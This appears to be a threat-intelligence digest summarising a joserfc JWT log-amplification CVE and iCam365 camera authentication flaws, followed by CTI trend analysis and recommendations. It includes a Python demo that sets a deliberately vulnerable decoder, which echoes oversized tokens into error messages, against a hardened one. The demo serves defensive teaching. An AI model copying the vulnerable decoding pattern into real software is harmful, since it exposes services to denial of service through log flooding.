A critical vulnerability (CVE-2025-65015, CVSS 9.2) in the joserfc Python library allows attackers to trigger resource exhaustion via oversized JWT tokens. The flaw occurs when malformed or large tokens processed by joserfc’s decoding functions embed their payloads into exception messages, generating massive log entries. This can overload logging systems, consume server resources (CPU, memory, disk), and cause denial-of-service conditions. Unauthenticated attackers can exploit this by sending HTTP requests with oversized headers, bypassing protections when reverse proxies such as nginx are absent. Patched versions (1.3.5, 1.4.2) remove payloads from error logs. Mitigation includes updating the library and enforcing header size limits via reverse proxies.
Read full article: Securityonline
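The log-amplification mechanism described above, as an added example that is not joserfc's code: a decode error that echoes the whole token into its message grows with attacker-controlled input, while a bounded variant rejects oversized tokens up front (the application-side equivalent of a proxy header limit) and logs only a length, a digest and a short prefix. The size limits are assumed values.

```python
import hashlib

# Constructed illustration of CVE-2025-65015's failure mode; not joserfc code.
MAX_TOKEN_LENGTH = 8192   # assumed cap, mirrors a reverse-proxy header limit
MAX_ECHOED_CHARS = 32     # assumed cap on token text echoed into a log line


class TokenDecodeError(ValueError):
    pass


def decode_unbounded(token: str) -> dict:
    """Vulnerable pattern: the full token text is embedded in the exception."""
    parts = token.split(".")
    if len(parts) != 3:
        raise TokenDecodeError(f"invalid JWT structure: {token}")
    return {"header": parts[0], "payload": parts[1], "signature": parts[2]}


def decode_bounded(token: str) -> dict:
    """Hardened pattern: size check first, then a fixed-size error summary."""
    if len(token) > MAX_TOKEN_LENGTH:
        raise TokenDecodeError(f"token too long: {len(token)} > {MAX_TOKEN_LENGTH}")
    parts = token.split(".")
    if len(parts) != 3:
        digest = hashlib.sha256(token.encode()).hexdigest()[:16]
        raise TokenDecodeError(
            f"invalid JWT structure: len={len(token)} sha256={digest} "
            f"prefix={token[:MAX_ECHOED_CHARS]!r}"
        )
    return {"header": parts[0], "payload": parts[1], "signature": parts[2]}


def error_message_size(decode, token: str) -> int:
    """Bytes that the decoder's error message would add to a log line."""
    try:
        decode(token)
    except TokenDecodeError as exc:
        return len(str(exc).encode())
    return 0


if __name__ == "__main__":
    oversized = "A" * (1024 * 1024)   # constructed 1 MiB garbage token
    print("unbounded:", error_message_size(decode_unbounded, oversized))
    print("bounded:  ", error_message_size(decode_bounded, oversized))
```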

ICAM365 CCTV Camera Multiple Models
The article details critical vulnerabilities (CVE-2025-64770, CVE-2025-62674) in iCam365 CCTV camera models P201 and QC021 (versions 43.4.0.0 and prior) due to missing authentication in ONVIF and RTSP services. Exploitation could allow unauthorized access to live video streams and configuration data, posing risks to commercial facilities globally. Both vulnerabilities have CVSS v3.1 scores of 6.8 and v4 scores of 7.0, with low attack complexity. iCam365 has not responded to coordination efforts, prompting CISA to advise network isolation, firewall use, VPNs for remote access, and minimizing internet exposure. No public exploitation has been reported, but proactive mitigation is urged, given the potential impact.
Read full article: Cisa


In-Depth Expert CTI Analysis

Recent law enforcement actions, including Europol’s Operation Endgame and international sanctions, disrupted major cybercrime operations, though persistent groups like ransomware affiliates and APTs continue to rebuild infrastructure. Nation-state actors from China, North Korea, and Russia advanced espionage campaigns using supply chain compromises, AI-driven attacks, and novel malware like Lazarus’ ScoringMathTea RAT. Ransomware remained pervasive, targeting critical infrastructure and exploiting third-party vulnerabilities, while vulnerabilities in widely used software (e.g., Chrome, Fortinet, Microsoft WSUS) posed systemic risks. Emerging threats include AI-powered autonomous attacks, generative AI document forgery, and mobile banking trojans evading detection. These trends highlight the challenges of sustaining disruption efforts and the urgency of global collaboration, proactive patching, and enhanced supply chain defenses.


Proactive Defense and Strategic Foresight

Recent cyber operations underscore the critical need for proactive defense and strategic foresight. While law enforcement actions like Operation Endgame 3.0 and sanctions on Media Land disrupt cybercrime temporarily, persistent adversaries rebuild infrastructure, necessitating continuous threat intelligence and adaptive controls. Supply chain compromises (npm, Salesforce) and AI-driven attacks (Anthropic) reveal escalating risks requiring preemptive hardening of third-party integrations and AI governance frameworks. Geopolitical targeting (APT24, Lazarus) and ransomware’s economic impact (Jaguar Land Rover) demand cross-sector collaboration and scenario-based planning. Investments in patching, zero-trust architectures, and ethical resilience (Checkout.com’s refusal to pay ransoms) exemplify forward-looking strategies to mitigate evolving threats before they materialize.


Evolving Ransomware and Malware Tactics

Ransomware and malware tactics continue evolving with increased sophistication, leveraging AI-driven attacks, supply chain compromises, and cryptocurrency ecosystems. Recent disruptions like Operation Endgame 3.0 highlight law enforcement’s temporary successes, yet resilient groups rebuild infrastructure or pivot tactics, exemplified by Akira and Lazarus Group’s advanced RATs. APT24’s stealthy BadAudio campaigns and China-aligned DNS hijacking underscore nation-state espionage trends. RansomHouse and ShinyHunters exploit third-party integrations, while crypto-mixing services and bulletproof hosting enable financial obfuscation. Emerging threats include AI-powered autonomous attacks, pre-installed device malware, and weaponized vulnerabilities in critical software. Mitigation demands proactive patching, enhanced third-party risk management, and international collaboration to disrupt cybercriminal ecosystems.


State-Sponsored and Organized Cybercrime Convergence

The convergence of state-sponsored and organized cybercrime is increasingly evident, with nation-states adopting criminal tactics for deniability and profit, while cybercriminals leverage advanced tools once reserved for APTs. Operations like Europol’s Endgame 3.0 and sanctions against Media Land reveal overlapping infrastructures, where ransomware groups (LockBit, BlackSuit) exploit bulletproof hosting tied to state-aligned entities. Chinese APT24’s BadAudio malware and Lazarus Group’s ScoringMathTea RAT demonstrate state actors’ use of criminal-grade tools for espionage, while North Korean crypto thefts fund regime objectives. Meanwhile, ransomware-as-a-service models and AI-driven attacks lower barriers for criminal enterprises, enabling industrial-scale fraud and supply-chain compromises. This symbiosis erodes traditional threat boundaries, demanding coordinated international sanctions, hardened critical infrastructure, and proactive intelligence-sharing to counter hybrid adversaries.


Operational and Tactical Implications

Operational Implications: Recent coordinated law-enforcement actions show progress against cybercrime but also its resilience, as affiliates rapidly rebuild infrastructure. This week reinforced the supply chain as a critical weak point, with massive npm pollution, a Salesforce/Gainsight compromise, and DNS-tampered updates targeting popular applications. Ransomware groups are moving into hypervisor attacks, with Akira now hitting Nutanix AHV via VPN flaws and poor segmentation. State-aligned actors used stealthy implants and cloud-abused loaders, revealing gaps across cloud, SOHO, and edge monitoring. Systems exposed to critical vulnerabilities in WSUS, Chrome V8, SonicWall, and FortiWeb remain at risk due to slow patching. The hijacking of Claude signals a shift toward AI-driven, machine-speed intrusions requiring adaptive, AI-aware defenses.


Tactical Implications: Organizations need stronger governance over third-party integrations and software dependencies to reduce supply-chain exposure. Zero-trust segmentation, hardened privileges, and enforced MFA are essential as ransomware operators pivot to hypervisors and VPN-based access. Widespread router exploitation and pre-installed spyware elevate the need for strict device lifecycle controls and mandatory firmware baselining. Detecting fileless threats requires behavioral EDR, memory scanning, and continuous telemetry tuning. Browser-in-the-Browser kits like Sneaky2FA demand advanced anti-phishing strategies including browser isolation and token protections. AI-automated attacks and cryptojacking waves call for anomaly-driven identity controls, adversarial-aware AI monitoring, and GPU/cluster usage baselines.


Forward-Looking Recommendations

  • Enhance international collaboration to disrupt cybercrime infrastructure and enforce sanctions against bulletproof hosting providers, focusing on financial nodes and cross-border legal frameworks.
  • Prioritize supply chain security through stricter vetting of third-party integrations, open-source registries, and software updates to counter hijacking and registry pollution campaigns.
  • Adopt zero-trust architectures and AI-driven anomaly detection to mitigate insider threats, credential theft, and evolving ransomware tactics like Akira and RansomHouse.
  • Invest in proactive defense against AI-powered threats, including autonomous attack agents and generative document forgery, with tailored detection models and ethical AI governance.
  • Accelerate patch management for critical vulnerabilities (e.g., WSUS, Chrome V8, FortiWeb) and enforce network segmentation to limit lateral movement in hypervisor and cloud environments.
  • Replace end-of-life IoT/SOHO devices vulnerable to state-sponsored botnets (e.g., WrtHug, AyySSHush) and mandate manufacturer accountability for pre-installed bloatware and firmware security.
  • Strengthen anti-phishing measures with multi-factor authentication (MFA), browser isolation, and user training to counter advanced PhaaS kits like Sneaky2FA and mobile trojans like Sturnus.
  • Expand cryptocurrency transaction monitoring and regulatory oversight to counter mixing services, cryptojacking, and laundering via compromised wallets and mining campaigns.
